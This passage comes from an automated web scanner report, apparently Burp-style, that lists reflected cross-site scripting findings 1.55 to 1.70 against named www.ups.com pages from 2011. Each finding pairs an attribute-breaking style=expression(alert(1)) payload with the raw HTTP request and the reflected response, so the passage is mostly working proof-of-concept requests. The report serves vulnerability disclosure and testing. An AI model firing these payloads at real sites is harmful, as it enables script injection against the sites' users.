The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c56a"style%3d"x%3aexpression(alert(1))"c7ff244ebad was submitted in the REST URL parameter 2. This input was echoed as 8c56a"style="x:expression(alert(1))"c7ff244ebad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us8c56a"style%3d"x%3aexpression(alert(1))"c7ff244ebad/en/locations/alliances/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:26 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33734


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us8c56a"style="x:expression(alert(1))"c7ff244ebad/en/locations/alliances/index.html">
...[SNIP]...

1.55. http://www.ups.com/content/us/en/locations/alliances/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/locations/alliances/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66bf6"style%3d"x%3aexpression(alert(1))"eb049b5ef2a was submitted in the REST URL parameter 3. This input was echoed as 66bf6"style="x:expression(alert(1))"eb049b5ef2a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en66bf6"style%3d"x%3aexpression(alert(1))"eb049b5ef2a/locations/alliances/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:27 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33734


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en66bf6"style="x:expression(alert(1))"eb049b5ef2a/locations/alliances/index.html">
...[SNIP]...

1.56. http://www.ups.com/content/us/en/locations/aso/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/locations/aso/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a18c"style%3d"x%3aexpression(alert(1))"85469569a7f was submitted in the REST URL parameter 2. This input was echoed as 9a18c"style="x:expression(alert(1))"85469569a7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us9a18c"style%3d"x%3aexpression(alert(1))"85469569a7f/en/locations/aso/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:25 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36772


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us9a18c"style="x:expression(alert(1))"85469569a7f/en/locations/aso/index.html">
...[SNIP]...

1.57. http://www.ups.com/content/us/en/locations/aso/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/locations/aso/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71006"style%3d"x%3aexpression(alert(1))"fb54cd13bc5 was submitted in the REST URL parameter 3. This input was echoed as 71006"style="x:expression(alert(1))"fb54cd13bc5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en71006"style%3d"x%3aexpression(alert(1))"fb54cd13bc5/locations/aso/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:27 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36772


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en71006"style="x:expression(alert(1))"fb54cd13bc5/locations/aso/index.html">
...[SNIP]...

1.58. http://www.ups.com/content/us/en/locations/custcenters/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/locations/custcenters/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 992bd"style%3d"x%3aexpression(alert(1))"fc1c542d606 was submitted in the REST URL parameter 2. This input was echoed as 992bd"style="x:expression(alert(1))"fc1c542d606 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us992bd"style%3d"x%3aexpression(alert(1))"fc1c542d606/en/locations/custcenters/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:28 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36791


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us992bd"style="x:expression(alert(1))"fc1c542d606/en/locations/custcenters/index.html">
...[SNIP]...

1.59. http://www.ups.com/content/us/en/locations/custcenters/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/locations/custcenters/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84cea"style%3d"x%3aexpression(alert(1))"fabf1550216 was submitted in the REST URL parameter 3. This input was echoed as 84cea"style="x:expression(alert(1))"fabf1550216 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en84cea"style%3d"x%3aexpression(alert(1))"fabf1550216/locations/custcenters/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:35 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36791


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en84cea"style="x:expression(alert(1))"fabf1550216/locations/custcenters/index.html">
...[SNIP]...

1.60. http://www.ups.com/content/us/en/locations/dropboxes/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/locations/dropboxes/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3203e"style%3d"x%3aexpression(alert(1))"21d9c88cca3 was submitted in the REST URL parameter 2. This input was echoed as 3203e"style="x:expression(alert(1))"21d9c88cca3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us3203e"style%3d"x%3aexpression(alert(1))"21d9c88cca3/en/locations/dropboxes/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:24 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37057


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us3203e"style="x:expression(alert(1))"21d9c88cca3/en/locations/dropboxes/index.html">
...[SNIP]...

1.61. http://www.ups.com/content/us/en/locations/dropboxes/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/locations/dropboxes/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e791a"style%3d"x%3aexpression(alert(1))"af78a44ca5c was submitted in the REST URL parameter 3. This input was echoed as e791a"style="x:expression(alert(1))"af78a44ca5c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/ene791a"style%3d"x%3aexpression(alert(1))"af78a44ca5c/locations/dropboxes/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:26 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37057


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/ene791a"style="x:expression(alert(1))"af78a44ca5c/locations/dropboxes/index.html">
...[SNIP]...

1.62. http://www.ups.com/content/us/en/locations/store/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/locations/store/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0680"style%3d"x%3aexpression(alert(1))"8203c807817 was submitted in the REST URL parameter 2. This input was echoed as f0680"style="x:expression(alert(1))"8203c807817 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usf0680"style%3d"x%3aexpression(alert(1))"8203c807817/en/locations/store/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:26 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38015


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usf0680"style="x:expression(alert(1))"8203c807817/en/locations/store/index.html">
...[SNIP]...

1.63. http://www.ups.com/content/us/en/locations/store/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/locations/store/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7ad9"style%3d"x%3aexpression(alert(1))"f95a058444a was submitted in the REST URL parameter 3. This input was echoed as a7ad9"style="x:expression(alert(1))"f95a058444a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/ena7ad9"style%3d"x%3aexpression(alert(1))"f95a058444a/locations/store/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:30 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38015


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/ena7ad9"style="x:expression(alert(1))"f95a058444a/locations/store/index.html">
...[SNIP]...

1.64. http://www.ups.com/content/us/en/myups/billing/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/myups/billing/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad5e0"style%3d"x%3aexpression(alert(1))"5145468c0af was submitted in the REST URL parameter 2. This input was echoed as ad5e0"style="x:expression(alert(1))"5145468c0af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usad5e0"style%3d"x%3aexpression(alert(1))"5145468c0af/en/myups/billing/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:23 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39410


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usad5e0"style="x:expression(alert(1))"5145468c0af/en/myups/billing/index.html">
...[SNIP]...

1.65. http://www.ups.com/content/us/en/myups/billing/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/myups/billing/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a57c4"style%3d"x%3aexpression(alert(1))"88004cee062 was submitted in the REST URL parameter 3. This input was echoed as a57c4"style="x:expression(alert(1))"88004cee062 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/ena57c4"style%3d"x%3aexpression(alert(1))"88004cee062/myups/billing/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:25 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39410


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/ena57c4"style="x:expression(alert(1))"88004cee062/myups/billing/index.html">
...[SNIP]...

1.66. http://www.ups.com/content/us/en/myups/mgmt/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/myups/mgmt/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd044"style%3d"x%3aexpression(alert(1))"8605e8dd69e was submitted in the REST URL parameter 2. This input was echoed as cd044"style="x:expression(alert(1))"8605e8dd69e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/uscd044"style%3d"x%3aexpression(alert(1))"8605e8dd69e/en/myups/mgmt/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:22 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33291


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/uscd044"style="x:expression(alert(1))"8605e8dd69e/en/myups/mgmt/index.html">
...[SNIP]...

1.67. http://www.ups.com/content/us/en/myups/mgmt/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/myups/mgmt/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d01d3"style%3d"x%3aexpression(alert(1))"63752b625b4 was submitted in the REST URL parameter 3. This input was echoed as d01d3"style="x:expression(alert(1))"63752b625b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/end01d3"style%3d"x%3aexpression(alert(1))"63752b625b4/myups/mgmt/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:24 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33291


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/end01d3"style="x:expression(alert(1))"63752b625b4/myups/mgmt/index.html">
...[SNIP]...

1.68. http://www.ups.com/content/us/en/register/help/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/register/help/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab43b"style%3d"x%3aexpression(alert(1))"d5a4fd981ac was submitted in the REST URL parameter 2. This input was echoed as ab43b"style="x:expression(alert(1))"d5a4fd981ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usab43b"style%3d"x%3aexpression(alert(1))"d5a4fd981ac/en/register/help/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:35 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 32099


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usab43b"style="x:expression(alert(1))"d5a4fd981ac/en/register/help/index.html">
...[SNIP]...

1.69. http://www.ups.com/content/us/en/register/help/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/register/help/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b516"style%3d"x%3aexpression(alert(1))"bdd9fbd3d6f was submitted in the REST URL parameter 3. This input was echoed as 3b516"style="x:expression(alert(1))"bdd9fbd3d6f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en3b516"style%3d"x%3aexpression(alert(1))"bdd9fbd3d6f/register/help/index.html?WT.svl=SubNav HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:41 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 32127


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en3b516"style="x:expression(alert(1))"bdd9fbd3d6f/register/help/index.html?WT.svl=SubNav">
...[SNIP]...

1.70. http://www.ups.com/content/us/en/register/reasons/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/register/reasons/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ae54"style%3d"x%3aexpression(alert(1))"37c623b859e was submitted in the REST URL parameter 2. This input was echoed as 7ae54"style="x:expression(alert(1))"37c623b859e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us7ae54"style%3d"x%3aexpression(alert(1))"37c623b859e/en/register/reasons/index.html?WT.svl=SubNav HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:36 GMT
Server: Apache
Cache-Control: no-cache
